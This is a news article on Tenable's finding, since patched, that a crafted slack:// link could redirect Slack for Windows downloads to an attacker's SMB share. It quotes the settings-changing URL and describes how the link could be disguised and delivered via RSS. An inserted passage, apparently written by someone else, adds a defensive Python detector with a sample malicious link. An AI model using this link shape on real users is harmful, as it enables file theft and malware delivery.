Slack patches vulnerability in Windows client that could be used to hijack files

Strangers in your Slack channel could have messed with Slack for Windows' download settings, redirecting files to a malicious shared folder. It's fixed now.

NOAH BERGER/AFP/Getty Images

On May 17, researchers at Tenable revealed that they had discovered a vulnerability in the Windows version of the desktop application for Slack, the widely used collaboration service. The vulnerability, in Slack Desktop version 3.3.7 for Windows, could have been used to change the destination of a file download from a Slack conversation to a remote file share owned by an attacker. This would allow the attacker not only to steal the files that were downloaded by a targeted user going forward, but it would potentially allow them to alter the files and add malware to them—that way when the victim opened the files, they would get a potentially nasty surprise.

Tenable reported the vulnerability to Slack via HackerOne. Slack has issued an update to the Windows desktop client that closes the vulnerability.

The potential attack used a weakness in the way the "slack://" protocol handler was implemented in the Windows application. By creating a crafted link posted in a Slack channel, the attacker could alter the default settings of the client—changing the download directory, for example, to a new location with a URL such as "slack://settings/?update={'PrefSSBFileDownloadPath':'<pathHere>'}". That path could be directed to a Server Message Block (SMB) file sharing location controlled by the attacker. Once clicked, all future downloads would be dropped onto the attacker's SMB server. This link could be disguised as a Web link—in a proof-of-concept, the malicious Slack attack posed as a link to Google.

A dissected view of a crafted Slack message with a malicious URL that changes the location where the Slack desktop application for Windows saves downloads.
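A defender-side check for the link shape described above, added here as an example and not code from Tenable, Slack or Ars Technica: it parses a slack:// URL, pulls out any PrefSSBFileDownloadPath update and flags one whose value is a UNC share path rather than a local folder, so the same logic can be run over message bodies or proxy logs. Only the preference key comes from the article; the function names, regexes and the sample message are my own constructions, and the host name in the sample is a placeholder.

```python
import re
from urllib.parse import urlparse, parse_qs

# Preference key taken from the crafted URL quoted in the article.
DOWNLOAD_PATH_PREF = "PrefSSBFileDownloadPath"

# A UNC-style share path: \\host\share or //host/share (what an SMB redirect looks like).
UNC_RE = re.compile(r"^(?:\\\\|//)[^\\/]+[\\/][^\\/]+")

# Pulls the download-path value out of the JSON-like update payload without evaluating it.
PREF_RE = re.compile(r"""['"]%s['"]\s*:\s*['"]([^'"]*)['"]""" % re.escape(DOWNLOAD_PATH_PREF))


def inspect_slack_link(url: str) -> dict:
    """Classify one slack:// URL: is it a settings update, which download path does it
    try to set, and is that path a remote (UNC) share rather than a local folder?"""
    result = {"settings_update": False, "download_path": None, "remote_path": False}
    parsed = urlparse(url)
    # urlparse places "settings" in netloc for slack://settings/?update=...
    if parsed.scheme != "slack" or parsed.netloc.lower() != "settings":
        return result
    updates = parse_qs(parsed.query).get("update")
    if not updates:
        return result
    result["settings_update"] = True
    match = PREF_RE.search(updates[0])
    if match:
        result["download_path"] = match.group(1)
        result["remote_path"] = bool(UNC_RE.match(match.group(1)))
    return result


def find_redirecting_links(text: str) -> list:
    """Return every slack:// link in a message body that points downloads at a remote share."""
    return [
        link for link in re.findall(r"slack://\S+", text)
        if inspect_slack_link(link)["remote_path"]
    ]


if __name__ == "__main__":
    # Constructed sample message; the host name is a placeholder, not a real indicator.
    sample = (
        "Check this out: slack://channel?team=T000&id=C000 and also "
        "slack://settings/?update={'PrefSSBFileDownloadPath':'\\\\placeholder-host\\share'}"
    )
    print(find_redirecting_links(sample))
```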

In a blog post, Tenable’s David Wells reviewed several ways that this could be used maliciously. Once the attacker had changed the default download location, "the attacker could have not only stolen the document, but even inserted malicious code in it so that when opened by victim after download (through the Slack application), their machine would have been infected," Wells wrote.

An attacker wouldn’t even have to be a member of a Slack channel to successfully inject the URL, Wells noted—the link could be fed into a channel via an RSS feed, for example, as Slack channels can be set up to subscribe to them. "I could make a post to a very popular Reddit community that Slack users around the world are subscribed to," Wells explained. That post could include a Web link "that will redirect to our malicious slack:// link and change settings when clicked." However, this attack would likely throw up a dialog box warning that a Web link was trying to open Slack—so it wouldn’t work unless a victim clicked with approval.


arstechnica
